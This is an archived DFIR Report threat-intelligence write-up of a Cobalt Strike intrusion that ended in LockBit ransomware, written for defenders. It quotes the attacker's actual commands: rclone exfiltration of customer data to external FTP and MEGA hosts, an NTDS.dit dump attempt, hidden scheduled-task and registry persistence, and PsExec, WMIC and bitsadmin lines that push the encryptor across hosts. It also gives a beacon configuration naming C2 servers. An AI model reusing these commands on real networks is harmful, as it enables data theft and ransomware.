{
	"id": "4aae827b-656c-4a5e-a2e9-26949917df8c",
	"created_at": "2026-04-06T00:10:04.697573Z",
	"updated_at": "2026-04-10T13:11:32.235128Z",
	"deleted_at": null,
	"sha1_hash": "48b8addb3e40a7f846774985d88c3e591b143efa",
	"title": "Cobalt Strike and a Pair of SOCKS Lead to LockBit Ransomware - The DFIR Report",
	"llm_title": "",
	"authors": "",
	"file_creation_date": "0001-01-01T00:00:00Z",
	"file_modification_date": "0001-01-01T00:00:00Z",
	"file_size": 8472139,
	"plain_text": "Cobalt Strike and a Pair of SOCKS Lead to LockBit Ransomware - The\r\nDFIR Report\r\nBy editor\r\nPublished: 2025-01-27 · Archived: 2026-04-05 20:04:49 UTC\r\nKey Takeaways\r\nThis intrusion began with the download and execution of a Cobalt Strike beacon that impersonated a Windows Media\r\nConfiguration Utility.\r\nThe threat actor used Rclone to exfiltrate data from the environment. First they attempted FTP transfers, that failed,\r\nbefore moving to using MEGA.io. A day later they ran a second successful FTP exfiltration.\r\nThe threat actor created several persistent backdoors in the environment, using scheduled tasks, GhostSOCKS and\r\nSystemBC proxies, and Cobalt Strike command and control access.\r\nLockBit ransomware was deployed across the environment on the 11th day of the intrusion.\r\nThe DFIR Report Services\r\nExplore this case in-depth with our hands-on DFIR Labs!\r\nPrivate Threat Briefs: 20+ private DFIR reports annually.\r\nThreat Feed: Focuses on tracking Command and Control frameworks like Cobalt Strike, Metasploit, Sliver, etc.\r\nAll Intel: Includes everything from Private Threat Briefs and Threat Feed, plus private events, Threat Actor Insights\r\nreports, long-term tracking, data clustering, and other curated intel.\r\nPrivate Sigma Ruleset: Features 170+ Sigma rules derived from 50+ cases, mapped to ATT\u0026CK with test examples.\r\nDFIR Labs: Offers cloud-based, hands-on learning experiences, using real data, from real intrusions. Interactive labs\r\nare available with different difficulty levels and can be accessed on-demand, accommodating various learning speeds.\r\nTable of Contents:\r\nCase Summary\r\nServices\r\nAnalysts\r\nInitial Access\r\nExecution\r\nPersistence\r\nPrivilege Escalation\r\nDefense Evasion\r\nCredential Access\r\nDiscovery\r\nLateral Movement\r\nCommand and Control\r\nExfiltration\r\nImpact\r\nTimeline\r\nDiamond Model\r\nIndicators\r\nDetections\r\nMITRE ATT\u0026CK\r\nCase Summary\r\nThis intrusion began near the end of January 2024 when the user downloaded and executed a file using the same name\r\n(setup_wm.exe) and executable icon, as the legitimate Microsoft Windows Media Configuration Utility. This executable was\r\na Cobalt Strike beacon and, once executed, an outbound connection was established.\r\nApproximately 30 minutes after the initial execution, the Cobalt Strike beacon initiated discovery commands, starting with\r\nnltest to identify domain controllers. Due to the elevated permissions of the initially compromised user, the threat actor\r\nleveraged SMB and remote services to deploy two proxy tools—SystemBC and GhostSOCKS—onto a domain controller.\r\nhttps://thedfirreport.com/2025/01/27/cobalt-strike-and-a-pair-of-socks-lead-to-lockbit-ransomware/\r\nPage 1 of 30\n\nWindows Defender detected these tools on the domain controller, initially leading us to believe that both were blocked.\r\nHowever, while GhostSOCKS was successfully prevented, the SystemBC proxy remained active, establishing a command\r\nand control channel from the domain controller. The threat actor then continued their operations from the beachhead host,\r\nexecuting additional situational awareness commands. They then injected code into the WUAUCLT.exe process and then\r\nextracted credentials from the LSASS process.\r\nThe injected process was observed loading the Seatbelt and SharpView CLR modules into its memory space.\r\nSimultaneously, the threat actor established persistence by creating scheduled tasks to execute the SystemBC and\r\nGhostSOCKS proxies on the beachhead host.\r\nApproximately an hour into the intrusion, the threat actor moved laterally to a file server by leveraging remote services with\r\nthe same account used to execute the initial access file on the beachhead. This service deployed a Cobalt Strike PowerShell\r\nbeacon, which communicated with a different command and control server than the one associated with the initial access\r\nmalware.\r\nOn the file server, the threat actor deployed the same proxy tools using identical scheduled tasks as those observed on the\r\nbeachhead host. This enabled command and control communication via both the SystemBC and GhostSOCKS proxies.\r\nShortly after, the threat actor initiated a RDP session to the file server through one of the established proxy tunnels.\r\nThe threat actor reviewed running processes using Task Manager before accessing the Local Group Policy Editor on the\r\nhost. Evidence indicates they specifically examined the Windows Defender configurations. Just minutes after this activity,\r\nregistry modifications to Windows Defender settings were observed, leading us to conclude that the threat actor made\r\nchanges in the Local Group Policy Editor.\r\nThe threat actor explored file shares on the server and discovered a sensitive document containing stored credentials. Next,\r\nthey attempted to deploy a Cobalt Strike PowerShell beacon to a backup server. When the initial attempt failed, they issued a\r\nremote WMI command from the beachhead host to disable Windows Defender real-time monitoring on the target server.\r\nShortly after, they launched a new remote service for the Cobalt Strike beacon, which successfully established connections\r\nto the command and control server.\r\nThe threat actor continued their discovery efforts by initiating a remote PowerShell session to execute Active Directory\r\nreconnaissance commands. They also attempted to access the NTDS.dit file on the domain controller; however, Windows\r\nDefender appeared to have blocked this attempt. Meanwhile, on the file server, the threat actor executed a binary named\r\ncheck.exe, which conducted various discovery activities. This tool probed remote hosts, gathering information such as their\r\navailability, disk usage, and installed programs.\r\nThe threat actor accessed the backup server via RDP, where they reviewed backup configurations and deployed the\r\nGhostSOCKS proxy, setting up scheduled tasks for persistence. Following this, their activity paused for approximately two\r\nhours before resuming.\r\nAround four hours after initial access, the threat actors began exfiltration activities. They were observed using Internet\r\nExplorer on the file server to access multiple temporary file-sharing sites. Although these sites are commonly used for\r\nstaging payloads, no downloads were detected. This suggests that the threat actors were likely starting data exfiltration rather\r\nthan retrieving additional tools.\r\nAbout 20 minutes after the initial exfiltration attempts, the threat actor transitioned to using Rclone for data exfiltration.\r\nTheir initial efforts to exfiltrate data via FTP failed, as all connection attempts to their configured FTP server were\r\nunsuccessful. This apparent frustration led to a pause in their activity for several hours. Upon returning, they deployed a new\r\nGhostSOCKS binary on the file server, this time establishing persistence through a registry run key instead of the previously\r\nused scheduled tasks.\r\nThe threat actor made another attempt at exfiltration using Rclone, this time targeting Mega.io as the remote destination. A\r\nsuccessful connection was established, and large-scale data exfiltration ensued, continuing uninterrupted for approximately\r\n40 minutes.\r\nAfter a 15-hour lull, the threat actor resumed activity by reviewing DNS configurations within the DNS Manager on the\r\ndomain controller. They then returned to the file server and reattempted exfiltration using Rclone with a newly configured\r\nFTP server. This time, the connection was successful, enabling continuous data transfers to the FTP server for approximately\r\n16 hours. Concurrently, while the exfiltration was in progress, they accessed the backup server and executed a PowerShell\r\nscript to extract stored credentials from the backup software’s database.\r\nThe threat actor remained largely dormant until the eleventh day, when they shifted focus to their final objective—\r\nransomware deployment. They designated the backup server as a staging ground, dropping multiple batch scripts designed\r\nto automate the deployment process with built-in redundancies. Leveraging tools such as PsExec and BITSAdmin, they\r\nhttps://thedfirreport.com/2025/01/27/cobalt-strike-and-a-pair-of-socks-lead-to-lockbit-ransomware/\r\nPage 2 of 30\n\ndistributed the ransomware binary across remote hosts, executing it remotely via both WMI and PsExec. To facilitate the\r\nattack, they deployed additional scripts to disable Windows Defender and modify RDP settings across the network.\r\nThe threat actor systematically executed these scripts, deploying the ransomware binary ds.exe, which was identified as\r\nLockBit ransomware. They successfully propagated the ransomware across all Windows hosts within the environment,\r\nachieving a Time to Ransomware (TTR) of just under 239 hours—spanning 11 calendar days from initial access to full\r\ndeployment.\r\nIf you would like to get an email when we publish a new report, please subscribe here.\r\nAnalysts\r\nAnalysis and reporting completed by r3nzsec, MyDFIR \u0026 MittenSec\r\nInitial Access\r\nThe intrusion began during January 2024, with the execution of a file named setup_wm.exe, which was downloaded from\r\nthe URL hxxps://accessservicesonline.com/setup_wm.exe\r\nThe file setup_wm.exe was a loader designed to deploy a Cobalt Strike beacon. The domain accessservicesonline[.]com,\r\nwhich hosted the malicious file, has been flagged by multiple security vendors as malicious and linked to activity associated\r\nwith Cobalt Strike.\r\nhttps://thedfirreport.com/2025/01/27/cobalt-strike-and-a-pair-of-socks-lead-to-lockbit-ransomware/\r\nPage 3 of 30\n\nExecution\r\nThe threat actor used various means to execute malicious files. While they created scheduled tasks on several hosts with a\r\nmeans to maintain persistence, they also manually ran many of these to execute the various malicious proxy tools like\r\nSystemBC and GhostSOCKS.\r\nService execution was also widely used and is discussed in depth in the lateral movement section. Other observed execution\r\npatterns relied on WMI, batch scripts and Psexec which are covered in other sections specific to their use.\r\nPersistence\r\nScheduled Tasks\r\nWe identified multiple scheduled tasks across several systems within the environment. These tasks were not limited to the\r\nbeachhead host but were observed throughout the compromised network.\r\nExample scheduled task configuration XML:\r\nhttps://thedfirreport.com/2025/01/27/cobalt-strike-and-a-pair-of-socks-lead-to-lockbit-ransomware/\r\nPage 4 of 30\n\nRegistry Run Key\r\nAs a second method of persistence, the threat actor utilized a “Run” key in the Windows registry to enable the automatic\r\nexecution of a GhostSOCKS payload upon user login. This was accomplished through the following PowerShell command:\r\npowershell -WindowStyle hidden -Command \"if (-Not (Test-Path 'HKCU:\\\\Software\\\\Microsoft\\\\Windows\\\\CurrentVers\r\nPrivilege Escalation\r\nThe threat actor utilized process injection techniques, such as injecting into WUAUCLT.exe, a legitimate process, to access\r\ncritical system resources, including the LSASS memory space.\r\nAdditionally, the threat actor created and executed scheduled tasks under SYSTEM privileges to maintain persistence. For\r\nexample, they deployed DLL files (svcmc.dll and svcmcc.dll) via scheduled tasks, ensuring their execution at system\r\nstartup. These tasks were created and run using the following commands:\r\nschtasks /create /ru SYSTEM /sc ONSTART /tn Update2 /tr \"cmd /c rundll32 %PUBLIC%\\music\\svcmc.dll, MainFunc\" s\r\nhttps://thedfirreport.com/2025/01/27/cobalt-strike-and-a-pair-of-socks-lead-to-lockbit-ransomware/\r\nPage 5 of 30\n\nFurthermore, administrative privileges were leveraged during the lateral movement to execute a PowerShell-based Cobalt\r\nStrike payload on a file server. The threat actor also utilized SMB to transfer tools such as the SystemBC DLL and a Golang\r\nbackdoor, both of which were executed through SYSTEM-level scheduled tasks.\r\nDefense Evasion\r\nTo deceive the user, the loader mimicked the legitimate Microsoft Windows Media Configuration Utility by using the same\r\nfile name and executable icon.\r\nAs part of their defense evasion strategy, the threat actor employed several methods to disable Windows Defender. While on\r\na file server, the threat actor edited the group policy setting related to Windows Defender. Threat actor opening group policy:\r\nSection of interest to threat actor:\r\nhttps://thedfirreport.com/2025/01/27/cobalt-strike-and-a-pair-of-socks-lead-to-lockbit-ransomware/\r\nPage 6 of 30\n\nRegistry modification observed minutes later on the host:\r\nThe command shown below utilizes WMIC to remotely create a process on a backup server. This process then executes a\r\nPowerShell script designed to disable real-time monitoring in Windows Defender.\r\nProcess injection into various legitimate processes on several systems was observed using the CreateRemoteThread API call.\r\nThis occurred with both the initial access file and later with various PowerShell Cobalt Strike beacons.\r\nhttps://thedfirreport.com/2025/01/27/cobalt-strike-and-a-pair-of-socks-lead-to-lockbit-ransomware/\r\nPage 7 of 30\n\nCredential Access\r\nDuring the credential access phase, the threat actor leveraged the injected process WUAUCLT to access the LSASS memory\r\nspace on the beachhead, a file server, and a backup server. The access permissions granted were 0x1010 and 0x1fffff, both of\r\nwhich are indicative of credential theft activities.\r\nThe code 0x1010 is broken down as follows:\r\n0x00000010 (VMRead): Grants the ability to read memory from a process.\r\n0x00001000 (QueryLimitedInfo): Allows retrieval of certain process-related information.\r\nIn contrast, the code 0x1fffff provides full access rights to a process, making it a clear indicator of credential-stealing tools.\r\nA suspicious CallTrace marked with UNKNOWN also revealed injected code activity.\r\nAdditionally, the threat actor attempted to use NTDSUtil via PowerShell remoting to extract credentials. However, this\r\nattempt was prevented by Windows Defender.\r\nAttempted NTDS.dit dump:\r\nC: \\Windows\\System32\\ntdsutil.exe ac in ntds ifm cr fu C:\\users \\public\\music\\1\r\nWindows Defender event logs indicate that an attempt to dump credentials was blocked:\r\nOn a backup server, the threat actor executed a PowerShell script named Veeam-Get-Creds.ps1. This script is publicly\r\navailable on GitHub as a method of recovering passwords from the Veeam Backup and Replication credential manager.\r\nhttps://thedfirreport.com/2025/01/27/cobalt-strike-and-a-pair-of-socks-lead-to-lockbit-ransomware/\r\nPage 8 of 30\n\nAdditionally, while on a file server, the threat actor was able to locate a file pertaining to shared account(s):\r\nDiscovery\r\nsetup_wm.exe\r\nAround an hour after the initial access occurred a single PowerShell command was observed from the Cobalt Stike beacon\r\nrunning the well known nltest Microsoft utility to discover Active Directory domain controllers.\r\nRight after this, the threat actor immediately pivoted to the domain controller. But after gaining lateral access to that host,\r\nthey returned to the beachhead for more discovery actions.\r\nhttps://thedfirreport.com/2025/01/27/cobalt-strike-and-a-pair-of-socks-lead-to-lockbit-ransomware/\r\nPage 9 of 30\n\nAround this same time on the beachhead an injected process, WUAUCLT.exe, was also observed loading Seatbelt and\r\nSharpView modules.\r\nSeatbelt is a post-exploitation tool designed to gather recon about a system. It can collect data like security settings,\r\ncredentials, browser history, and more.\r\nSharpView is an AD recon tool that can map an entire AD environment and provide key details like users, groups,\r\npermissions, and relationships.\r\nDuring the first day, the threat actor dropped a binary check.exe onto a file server.\r\nThis Visual Basic GUI software accepts an IP address as input and generates multiple files with detailed information about\r\nthe corresponding computer.\r\nhttps://thedfirreport.com/2025/01/27/cobalt-strike-and-a-pair-of-socks-lead-to-lockbit-ransomware/\r\nPage 10 of 30\n\nAround the same time as the threat actor was running check.exe, they initiated a remote PowerShell session to a domain\r\ncontroller to run some Active Directory discovery using PowerShell.\r\nOn a file server the threat actor reviewed Windows Task Manager several times.\r\nThroughout the intrusion the threat actor reviewed Group Policy settings. On the first day, they checked Windows Defender\r\nsettings on a file server. On the final day, they checked on the backup server after completing their ransom deployment.\r\nLateral Movement\r\nhttps://thedfirreport.com/2025/01/27/cobalt-strike-and-a-pair-of-socks-lead-to-lockbit-ransomware/\r\nPage 11 of 30\n\nRDP\r\nThe threat actor was observed using RDP during the intrusion. In the first two days, they leveraged a file server as a pivot\r\nhost. On the final day, RDP sessions were initiated from the beachhead host to both a file server and a backup server.\r\nAuthentication data from normal 4624 events was absent from the data collected, but using Microsoft-Windows-TerminalServices-LocalSessionManager eventID 21 logs, we were able to identify the logon activity.\r\nWinRM\r\nDuring the first day, the threat actor started a remote PowerShell session from the file server to a domain controller using\r\nWinRM. This session was then used to run Active Directory discovery commands. This was logged in Windows PowerShell\r\nlogs eventID’s 4103/4104.\r\nLocal Host:\r\nhttps://thedfirreport.com/2025/01/27/cobalt-strike-and-a-pair-of-socks-lead-to-lockbit-ransomware/\r\nPage 12 of 30\n\nRemote Host:\r\nWMI\r\nThe threat actors used the /node option to run a remote command on a backup server and later during ransomware\r\ndeployment, this is covered further in the Defense Evasion and Impact sections.\r\nPsexec\r\nSystinternal’s Psexec was used by the threat actor for remote execution activity related to the ransomware deployment,\r\nreferred to in the Impact section.\r\nRemote Service/SMB\r\nThe threat actors repeatedly leveraged remote services to facilitate lateral movement within the network. Their activity\r\nbegan with the deployment of SystemBC and GhostSOCKS proxy tools to a domain controller.\r\nThe following data illustrates SMB network activity used to transfer the proxy tools to the domain controller:\r\nRemote service creation:\r\nThis kind of remote service creation can also be identified over the network with IDS detections such as ET RPC DCERPC\r\nSVCCTL – Remote Service Control Manager Access.\r\nhttps://thedfirreport.com/2025/01/27/cobalt-strike-and-a-pair-of-socks-lead-to-lockbit-ransomware/\r\nPage 13 of 30\n\nLater they used the jump psexec_psh feature of Cobalt Strike to execute PowerShell beacons on a file share server and\r\nbackup server via remote services.\r\nAfter initial Base64 decoding, we found the payload used the default Cobalt Strike XOR value of 35.\r\nAfter decoding the second layer of obfuscation using the XOR key 35, we have the next layer of base64 strings. We can use\r\nthe XOR key 35 to decode this again. As our next step, we can use the cyber chef recipe below.\r\nRegular_expression('User defined','[a-zA-Z0-9+/=]{30,}',true,true,false,false,false,false,'List matches')\r\nFrom_Base64('A-Za-z0-9+/=',true)\r\nGunzip()\r\nLabel('Decode')\r\nRegular_expression('User defined','[a-zA-Z0-9+/=]{30,}',true,true,false,false,false,false,'List matches')\r\nConditional_Jump('',false,'',10)\r\nFrom_Base64('A-Za-z0-9+/=',true)\r\nXOR({'option':'Decimal','string':'35'},'Standard',false)\r\nThe PowerShell is base64 encoded. Decoding the PowerShell shows that the SMB pipe is named:\r\n\\\\.\\pipe\\fullduplex_84\r\nhttps://thedfirreport.com/2025/01/27/cobalt-strike-and-a-pair-of-socks-lead-to-lockbit-ransomware/\r\nPage 14 of 30\n\nUpon analyzing the output with Didier Stevens’ 1768.py script, the findings revealed a match to Cobalt Strike shellcode\r\nassociated with psexec_psh activity.\r\nCommand and Control\r\nCobalt Strike (S0154)\r\nThe initial command and control was a Cobalt Strike beacon to compdatasystems.com triggered by the execution of\r\nsetup_wm.exe.\r\nIP Port Domain Ja3 Ja3s\r\n31.172.83.162 443 compdatasystems[.]com a0e9f5d64349fb13191bc781f81f42e1 8ed408107f89c53261bf74e58517bc\r\n31.172.83.162 443 user.compdatasystems[.]com a0e9f5d64349fb13191bc781f81f42e1 8ed408107f89c53261bf74e58517bc\r\n159.100.14.254 443 retailadvertisingservices[.]com a0e9f5d64349fb13191bc781f81f42e1 303951d4c50efb2e991652225a6f02\r\nhttps://thedfirreport.com/2025/01/27/cobalt-strike-and-a-pair-of-socks-lead-to-lockbit-ransomware/\r\nPage 15 of 30\n\nAs part of the command and control (C2) phase, the threat actor established a connection to a second Cobalt Strike C2 server\r\nusing the IP address 159.100.14.254 over port 443. The domain associated with this server was\r\nretailadvertisingservices[.]com.\r\nDuring this activity, process injection was observed, with the threat actor targeting legitimate processes such as svchost.exe.\r\nThe injection activity allowed them to run malicious code within trusted system processes.\r\nCommunication with these command and control servers continued over the length of the intrusion.\r\nThe configuration of the setup_wm.exe beacon is below:\r\n{\r\n \"BeaconType\": [\r\n \"HTTPS\"\r\n ],\r\n \"Port\": 443,\r\n \"SleepTime\": 62760,\r\n \"MaxGetSize\": 1864954,\r\n \"Jitter\": 37,\r\n \"C2Server\": \"compdatasystems.com,/_next.css\",\r\n \"HttpPostUri\": \"/boards\",\r\n \"Malleable_C2_Instructions\": [\r\n \"Remove 814 bytes from the beginning\",\r\n \"Base64 decode\",\r\n \"Base64 decode\"\r\n ],\r\n \"HttpGet_Verb\": \"GET\",\r\n \"HttpPost_Verb\": \"POST\",\r\n \"HttpPostChunk\": 0,\r\n \"Spawnto_x86\": \"%windir%\\\\syswow64\\\\WUAUCLT.exe\",\r\n \"Spawnto_x64\": \"%windir%\\\\sysnative\\\\WUAUCLT.exe\",\r\n \"CryptoScheme\": 0,\r\n \"Proxy_Behavior\": \"Use IE settings\",\r\n \"Watermark\": 1357776117,\r\n \"bStageCleanup\": \"True\",\r\n \"bCFGCaution\": \"False\",\r\n \"KillDate\": 0,\r\n \"bProcInject_StartRWX\": \"False\",\r\n \"bProcInject_UseRWX\": \"False\",\r\n \"bProcInject_MinAllocSize\": 10425,\r\n \"ProcInject_PrependAppend_x86\": [\r\nhttps://thedfirreport.com/2025/01/27/cobalt-strike-and-a-pair-of-socks-lead-to-lockbit-ransomware/\r\nPage 16 of 30\n\n\"kJCQkJCQkJA=\",\r\n \"Empty\"\r\n ],\r\n \"ProcInject_PrependAppend_x64\": [\r\n \"kJCQkJCQkJA=\",\r\n \"Empty\"\r\n ],\r\n \"ProcInject_Execute\": [\r\n \"CreateThread\",\r\n \"RtlCreateUserThread\",\r\n \"CreateRemoteThread\"\r\n ],\r\n \"ProcInject_AllocationMethod\": \"VirtualAllocEx\",\r\n \"bUsesCookies\": \"True\",\r\n \"HostHeader\": \"Host: user.compdatasystems.com\"\r\n}\r\nSystemBC\r\nUsing dynamic analysis, we were able to determine several of the dropped files as SystemBC.\r\nFile Name SHA256 Hash IP:Port\r\nsvc.dll 2389b3978887ec1094b26b35e21e9c77826d91f7fa25b2a1cb5ad836ba2d7ec4 185.236.232.20:445\r\nsvcmcc.dll 44cf04192384e920215f0e335561076050129ad7a43b58b1319fa1f950f6a7b6 185.236.232.20:445\r\nCommunication to the SystemBC command and control server started on the first day and lasted over the length of the\r\nintrusion.\r\nGhostSOCKS\r\nAnalysis revealed that the other deployed proxy was GhostSOCKS, a Malware-as-a-Service (MaaS) tool.\r\nFile Name SHA256 Hash YARA Hit\r\nsvcmc.dll ced4ee8a9814c243f0c157cda900def172b95bb4bc8535e480fe432ab84b9175 win_ghostsocks_auto\r\nsvchosts.exe b4ad5df385ee964fe9a800f2cdaa03626c8e8811ddb171f8e821876373335e63 win_ghostsocks_auto\r\nThese binaries were deployed on the beachhead host as well as a file share server and a backup server. Upon execution these\r\nbinaries reached out to the following command and control servers:\r\nhttps://thedfirreport.com/2025/01/27/cobalt-strike-and-a-pair-of-socks-lead-to-lockbit-ransomware/\r\nPage 17 of 30\n\nIP Port URI\r\n38.180.61.247 30001\r\n/api/helper-first-register?\r\nbuildVersion=EXAMPLE\u0026md5=EXAMPLE\u0026proxyPassword=EXAMPLE\u0026proxyUsername=EXAMPLE\u0026us\r\n195.2.70.38 30001\r\n/api/helper-first-register?\r\nbuildVersion=EXAMPLE\u0026md5=EXAMPLE\u0026proxyPassword=EXAMPLE\u0026proxyUsername=EXAMPLE\u0026us\r\n91.142.74.28 30001\r\n/api/helper-first-register?\r\nbuildVersion=EXAMPLE\u0026md5=EXAMPLE\u0026proxyPassword=EXAMPLE\u0026proxyUsername=EXAMPLE\u0026us\r\nTraffic to the GhostSocks server was only observed on the first day.\r\nExfiltration\r\nFrom a file share server the threat actor opened internet explorer and pulled up two sites, qaz[.]im and temp[.]sh.\r\nBoth of these sites are known as anonymous temporary file sharing services. They are often used to deploy tools or payloads\r\nby threat actors, but in this case we did not observe any downloads. This leads us to assess that they likely used the sites for\r\nsome small scale data exfiltration.\r\nAround 20 minutes later the threat actor move on to large scale exfiltration using Rclone.\r\nhttps://thedfirreport.com/2025/01/27/cobalt-strike-and-a-pair-of-socks-lead-to-lockbit-ransomware/\r\nPage 18 of 30\n\nTheir initial attempt to exfiltrate data with Rclone utilized a FTP configuration targeting a remote server at 93.115.26.127\r\nover port 21. This attempt to exfiltrate data failed because a connection to the remote server could not be established.\r\nThe command that was executed was:\r\n\"%PUBLIC%\\Music\\rclone.exe\" copy E:\\REDACTED\\customers ftp1:REDACTED/customers -q --ignore-existing --REDACTED\r\nTwo hours later, the threat actor changed tactics and leveraged Rclone’s MEGA integration to exfiltrate data to Mega.io. The\r\nfollowing command was executed during this second attempt:\r\n%WINDIR%\\system32\\cmd.exe /C .\\rclone.exe copy \"E:\\REDACTED\\domain\" mega:REDACTED/domain -q --ignore-existing\r\nThe initial attempt successfully led to data exfiltration to the Mega.io storage service. The following day, the threat actor\r\nleveraged a second FTP account and a different server hard-coded into the rclone configuration, achieving another\r\nsuccessful exfiltration.\r\nAnalysis of network logs revealed that several gigabytes of data were exfiltrated over a 16-hour period.\r\nImpact\r\nhttps://thedfirreport.com/2025/01/27/cobalt-strike-and-a-pair-of-socks-lead-to-lockbit-ransomware/\r\nPage 19 of 30\n\nOn the eleventh day, the threat actor began a ransomware deployment. This final stage included the preparatory steps to\r\ndeploy across the network. The process started with the execution of a batch script named SETUP.bat, which created a\r\nstaging file share:\r\n\"%WINDIR%\\System32\\cmd.exe\" /C \"%PUBLIC%\\Music\\SETUP.bat\"\r\nnet session\r\nnet share share$=%PUBLIC%\\Music /GRANT:Everyone,READ /Y\r\nSeveral files, including the LockBit ransomware encryptor, ds.exe, PSExec, and other helper batch scripts, were uploaded to\r\nthis shared directory to facilitate the ransomware deployment. These scripts included redundancy for sharing the\r\nransomware binary and executing it.\r\nNext, a script named WMI.bat utilized WMI to copy the ransomware payload from the shared directory (SHARE$) to local\r\nmachines and execute it. Notably, the threat actor did not limit their targeting to specific hosts but aimed at all accessible\r\nhosts within identified subnets. The payload execution command was as follows:\r\n%WINDIR%\\system32\\cmd.exe /c \"\"%PUBLIC%\\Music\\WMI.bat\" %PUBLIC%\\Music\\SETUP.bat %PUBLIC%\\Music\\COPY.bat %PUBLI\r\nWMI commands further facilitated payload distribution, leveraging bitsadmin to transfer and execute the ransomware on\r\nremote hosts. These commands triggered parent-child process chains, such as wmiprvse.exe spawning from bitsadmin\r\ncommands:\r\nwmic /node:ipv4address,REDACTED,REDACTED,REDACTED,REDACTED /user:\"domain.local\\Administrator\" /password:\"REDAC\r\nAdditionally, the threat actor employed a batch script named COPY.bat to use PSExec for copying the payload from the\r\nshared directory to target machines. Evidence of PSExec executions were identifiable by Service Creation events (Event ID\r\n7045) and execution of PSEXESVC.exe. The relevant commands were:\r\nhttps://thedfirreport.com/2025/01/27/cobalt-strike-and-a-pair-of-socks-lead-to-lockbit-ransomware/\r\nPage 20 of 30\n\nSource Host executing copy.bat and, by extension PsExec.exe:\r\nPsExec.exe /accepteula @comps1.txt -u \"domain.local\\Administrator\" -p \"REDACTED\" cmd /c COPY \"\\\\REDACTED\\share\r\n1. Source Host Execution\r\n%WINDIR%\\system32\\cmd.exe /c \"\"%PUBLIC%\\Music\\share$\\COPY.bat\"\r\n └── \"PsExec.exe /accepteula -d \\\\REDACTED -u \"domain.local\\Administrator\" -p \"REDACTED\" cmd /c COPY\r\nDestination Host executing the command to copy the LockBit encryptor to the local machine:\r\n2. Service Execution (Destination Host)\r\nPSEXESVC.exe\r\n └── \"cmd\" /c COPY /Y \"\\\\REDACTED\\share$\\ds.exe\" \"%PUBLIC%\\Music\"\r\nThe threat actor executed the LockBit encryptor using a batch file named EXE1.bat, which leveraged PSExec to run the\r\nransomware binary, ds.exe, on the hosts, copying it into their Windows temporary folders.\r\nLockBit Execution from Source host via PSExec:\r\n%WINDIR%\\system32\\cmd.exe /c \"\"C:\\share$\\EXE1.bat\" \"\r\n └── C:\\share$\\PsExec.exe -d @C:\\share$\\comps1.txt -u \"domain.local\\Administrator\" -p \"REDACTED\" cmd\r\nThe threat actor also utilized a modified version of WMI1.bat to distribute and execute the payload via WMI commands,\r\ntargeting hosts listed in an input file. This phase exhibited similar process behavior as earlier, with wmiprvse.exe spawning\r\nthe transfer tasks:\r\n1. LockBit Execution from Source host via WMIC:\r\n%WINDIR%\\system32\\cmd.exe /c \"\"C:\\share$\\WMI1.bat\" \"\r\n └── wmic /node:@C:\\share$\\comps1.txt /user:\"domain.local\\Administrator\" /password:\"REDACTED\" process\r\nSimilar to the previous WMI execution, on the remote host, wmiprvse.exe will be responsible for spawning the Bitsadmin\r\ntransfer job.\r\nhttps://thedfirreport.com/2025/01/27/cobalt-strike-and-a-pair-of-socks-lead-to-lockbit-ransomware/\r\nPage 21 of 30\n\n1. LockBit Execution on Destination host via WMIC:\r\nwmiprvse.exe\r\n └── cmd.exe /c bitsadmin /transfer ds \\\\REDACTED\\share$\\ds.exe %APPDATA%\\ds.exe\u0026%APPDATA%\\ds.exe -pa\r\n └── bitsadmin /transfer ds \\\\REDACTED\\share$\\ds.exe %APPDATA%\\ds.exe\r\nThe entire deployment activity took approximately two hours. Despite several errors during execution, the threat actor\r\nsuccessfully deployed the LockBit ransomware. Encrypted hosts displayed a modified desktop background, redirecting users\r\nto the ransom note.\r\nhttps://thedfirreport.com/2025/01/27/cobalt-strike-and-a-pair-of-socks-lead-to-lockbit-ransomware/\r\nPage 22 of 30\n\nTimeline\r\nhttps://thedfirreport.com/2025/01/27/cobalt-strike-and-a-pair-of-socks-lead-to-lockbit-ransomware/\r\nPage 23 of 30\n\nhttps://thedfirreport.com/2025/01/27/cobalt-strike-and-a-pair-of-socks-lead-to-lockbit-ransomware/\r\nPage 24 of 30\n\nDiamond Model\r\nIndicators\r\nAtomic\r\nhxxps://accessservicesonline[.]com/setup_wm.exe\r\nCobalt Strike:\r\n31.172.83[.]162:443\r\nuser[.]compdatasystems[.]com\r\ncompdatasystems[.]com\r\n159.100.14[.]254:443\r\nretailadvertisingservices[.]com\r\nSystemBC:\r\n185.236.232[.]20:445\r\nGhostSOCKS:\r\n91[.]142[.]74[.]28|30001\r\n195[.]2[.]70[.]38|30001\r\n38[.]180[.]61[.]247|30001\r\nFTP exfiltration servers:\r\n93.115.26[.]127:21\r\n46.21.250[.]52:21\r\nComputed\r\nFile: svchosts.exe\r\n6505b488d0c7f3eaee66e3db103d7b05\r\nbf2b396b8fb0b1de27678aab877b6f177546d1c5\r\nb4ad5df385ee964fe9a800f2cdaa03626c8e8811ddb171f8e821876373335e63\r\nFile: dfg.exe\r\n671b967eb2bc04a0cd892ca225eb5034\r\nab1777107d9996e647d43d1194922b810f198514\r\nb79bb3302691936df7c3315ff3ba7027f722fc43d366ba354ac9c3dac2e01d03\r\nhttps://thedfirreport.com/2025/01/27/cobalt-strike-and-a-pair-of-socks-lead-to-lockbit-ransomware/\r\nPage 25 of 30\n\nFile: svc.dll\r\n03af38505cee81b9d6ecd8c1fd896e0e\r\n1ac66fcc34c0b86def886e4e168030dae096927c\r\n2389b3978887ec1094b26b35e21e9c77826d91f7fa25b2a1cb5ad836ba2d7ec4\r\nFile: Veeam-Get-Creds.ps1\r\n0f7b6bb3a239cf7a668a8625e6332639\r\n5263a135f09185aa44f6b73d2f8160f56779706d\r\n18051333e658c4816ff3576a2e9d97fe2a1196ac0ea5ed9ba386c46defafdb88\r\nFile: svcmc.dll\r\nea327ed0a3243847f7cd87661e22e1de\r\n450d54d5737164579416ca99af1eb3fa1d4aaff9\r\nced4ee8a9814c243f0c157cda900def172b95bb4bc8535e480fe432ab84b9175\r\nFile: setup_wm.exe\r\n57f791f7477b1f7a1b3605465d054db8\r\nbba1bc3ebf07ca3c4e2442f0ba9ea18383ce627b\r\nd8b2d883d3b376833fa8e2093e82d0a118ba13b01a2054f8447f57d9fec67030\r\nFile: check.exe\r\n6e91c474d90546845b1f3f9e7a33411a\r\n9352236ad6fe8835979cf11ba5033f8f2fef0f19\r\n3f97e112f0c5ddf0255ef461746a223208dc0846bde2a6dca9c825d9c706a4e9\r\nFile: 